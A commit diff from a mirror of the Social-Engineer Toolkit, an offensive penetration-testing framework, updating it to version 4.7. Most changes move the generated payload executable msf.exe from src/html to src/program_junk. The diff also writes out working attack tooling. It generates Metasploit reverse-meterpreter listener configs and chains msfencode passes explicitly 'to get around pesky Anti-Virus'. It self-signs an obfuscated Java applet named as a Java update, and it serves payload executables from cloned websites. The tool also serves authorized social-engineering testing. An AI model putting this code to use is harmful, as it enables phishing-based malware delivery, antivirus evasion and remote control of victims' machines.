Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-02-17 13:58:34 +00:00
Code Issues Projects Releases Packages Wiki Activity

Updated code base for version 4.7

Browse source
This commit is contained in:
TrustedSec 2013-03-15 11:35:31 -04:00
parent e18754c11f
commit bf0ac67474
12 changed files with 50 additions and 45 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
src/autorun/autorun.py
View file

@ -20,7 +20,7 @@ me = mod_name()
trigger = 0
if os.path.isfile("src/program_junk/standardpayload.file"):
trigger = 1
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/html/msf.exe autorun/program.exe 1> /dev/null 2> /dev/null;cp src/program_junk/msf.exe autorun/program.exe 1> /dev/null 2>/dev/null", shell=True).wait()
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/program_junk/msf.exe autorun/program.exe 1> /dev/null 2> /dev/null;cp src/program_junk/msf.exe autorun/program.exe 1> /dev/null 2>/dev/null", shell=True).wait()
if os.path.isfile("src/program_junk/fileformat.file"):
trigger = 2
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/program_junk/template.pdf autorun/ 1> /dev/null 2>/dev/null", shell=True).wait()

47
src/core/payloadgen/create_payloads.py
View file

@ -293,7 +293,7 @@ try:
check_write=file("src/program_junk/custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe") #subprocess.Popen("cp %s msf.exe;cp msf.exe %s/src/html/msf.exe" % (choice1,definepath), shell=True).wait()
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", "%s/src/program_junk/msf.exe" % (definepath))
# Specify Encoding Option
@ -455,8 +455,10 @@ try:
# here we prep our meta config to listen on all the ports we want - free hugs all around
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), shellcode_ports)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
@ -637,7 +639,6 @@ try:
if encode == "MULTIENCODE":
print_info("Encoding the payload multiple times to get around pesky Anti-Virus.")
encodepayload=subprocess.Popen(r"ruby %s/msfencode -e x86/shikata_ga_nai -i %s/src/program_junk/1msf.exe -t raw -c 5 | ruby %s/msfencode -t raw -e x86/alpha_upper -c 2 | ruby %s/msfencode -t raw -e x86/shikata_ga_nai -c 5 | ruby %s/msfencode -t exe -c 5 -e x86/countdown -o %s/src/program_junk/msf.exe" % (path,definepath,path,path,path,definepath), shell=True).wait()
#subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
encode1=("x86/countdown")
# If option 16, backdoor executable better AV avoidance
@ -704,24 +705,26 @@ try:
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/src/program_junk/multi_meta" % (definepath)):
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), choice3)
if port_check == False:
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":

14
src/core/payloadprep.py
View file

@ -129,7 +129,7 @@ if payload_selection == "SETSHELL":
filewrite = open("src/program_junk/msf.exe" , "wb")
filewrite.write(data.replace(str(ipaddr_count), ipaddr+"\x00", 1))
filewrite.close()
shutil.copyfile("src/program_junk/msf.exe", "src/html/msf.exe")
#shutil.copyfile("src/program_junk/msf.exe", "src/html/msf.exe")
# if we selected RATTE in our payload selection
if payload_selection == "RATTE":
@ -209,9 +209,9 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/program_junk/web_clone/x", "src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/html/msf.exe"):
os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/html/msf.exe")
#if os.path.isfile("src/html/msf.exe"):
# os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
os.remove("src/program_junk/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
@ -231,9 +231,9 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/payloads/set_payloads/http_shell.binary", "src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/html/msf.exe"):
os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/html/msf.exe")
# if os.path.isfile("src/html/msf.exe"):
# os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
os.remove("src/program_junk/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")

4
src/core/set.py
View file

@ -782,8 +782,8 @@ try:
if os.path.isfile("src/program_junk/meterpreter.alpha"):
print "[*] Saving alphanumeric shellcode in root directory of SET as meterpreter.alpha"
shutil.copyfile("src/program_junk/meterpreter.alpha", "meterpreter.alpha")
if os.path.isfile("src/html/msf.exe"):
shutil.copyfile("src/html/msf.exe", "msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
shutil.copyfile("src/program_junk/msf.exe", "msf.exe")
# if we didn't select the SET interactive shell or RATTE
if not os.path.isfile("src/program_junk/set.payload"):

6
src/core/setcore.py
View file

@ -612,7 +612,7 @@ def meterpreter_reverse_tcp_exe(port):
random_value = generate_random_string(5, 10)
# copy the created executable to program_junk
print_status("Executable created under src/program_junk/%s.exe" % (random_value))
subprocess.Popen("cp src/html/msf.exe src/program_junk/%s.exe" % (random_value), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/%s.exe" % (random_value), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
#
# Start a metasploit multi handler
#
@ -692,7 +692,7 @@ def java_applet_attack(website, port, directory):
#if os.path.isfile("src/program_junk/rand_gen"):
# move the file to the specified directory and filename
subprocess.Popen("cp src/html/msf.exe %s/%s" % (directory,filename), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp src/program_junk/msf.exe %s/%s" % (directory,filename), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp src/program_junk/Signed_Update.jar %s" % (directory), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
@ -844,7 +844,7 @@ def show_banner(define_version,graphic):
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Headshot""" + bcolors.BLUE + """' [---]
[---] Codename: '""" + bcolors.YELLOW + """Headshot""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]

2
src/fasttrack/mssql.py
View file

@ -92,7 +92,7 @@ def deploy_hex2binary(ipaddr,port,username,password,option):
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary

BIN
src/html/Signed_Update.jar.orig
View file

Binary file not shown.

11
src/html/spawn.py
View file

@ -196,15 +196,16 @@ def web_server_start():
if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
mac = check_options("MAC.BIN=")
shutil.copyfile("%s/src/html/mac.bin" % (definepath), "%s/src/program_junk/web_clone/%s" % (definepath, mac))
if os.path.isfile("%s/src/html/msf.exe" % (definepath)):
if os.path.isfile("%s/src/program_junk/msf.exe" % (definepath)):
win = check_options("MSF.EXE=")
shutil.copyfile("%s/src/html/msf.exe" % (definepath), "%s/src/program_junk/web_clone/%s" % (definepath,win))
shutil.copyfile("%s/src/program_junk/msf.exe" % (definepath), "%s/src/program_junk/web_clone/%s" % (definepath,win))
# pull random name generation
print_status("The site has been moved. SET Web Server is now listening..")
rand_gen = check_options("MSF_EXE=")
if rand_gen != 0:
if os.path.isfile("%s/src/program_junk/custom.exe" % (definepath)):
shutil.copyfile("src/html/msf.exe", "src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe")
print "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/web_clone/%s" % (rand_gen))
os.chdir("%s/src/program_junk/web_clone" % (definepath))
@ -300,7 +301,7 @@ def web_server_start():
break
if apache == 1:
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/src/html/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/Signed* %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path), shell=True).wait()
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/Signed* %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path), shell=True).wait()
# if we are tracking users
if track_email == "on":
now=datetime.datetime.today()
@ -463,7 +464,7 @@ try:
print (bcolors.BLUE + "\n***************************************************")
print (bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack.")
print (bcolors.BLUE + "***************************************************")
print (bcolors.PURPLE+ "\n[--] Tested on Windows, Mac, and OSX [--]" + bcolors.ENDC)
print (bcolors.PURPLE+ "\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC)
if apache == 1:
print (bcolors.GREEN+ "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC)

BIN
src/html/unsigned/unsigned.jar
View file

Binary file not shown.

1
src/payloads/powershell/prep.py
View file

@ -99,6 +99,7 @@ if multi_injection == "on":
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\n set LHOST 0.0.0.0\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
# if its turned to off
if multi_injection == "off":
print_status("Generating x64-based powershell injection code...")

4
src/teensy/teensy.py
View file

@ -118,12 +118,12 @@ pause = raw_input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir src/program_junk/web_clone/;cp src/html/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("mkdir src/program_junk/web_clone/;cp src/program_junk/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null", shell=True).wait()
if operating_system != "windows":
child=pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
subprocess.Popen("cp src/program_junk/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
if os.path.isfile("src/program_junk/meta_config"):
print bcolors.BLUE + "\n[*] Launching MSF Listener..."
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC

4
src/webattack/java_applet/sign_jar.py
View file

@ -22,9 +22,9 @@ Is this correct: yes
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Update.jar signapplet2", shell=True).wait()
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait()
# move it into our html directory
subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
subprocess.Popen("cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)"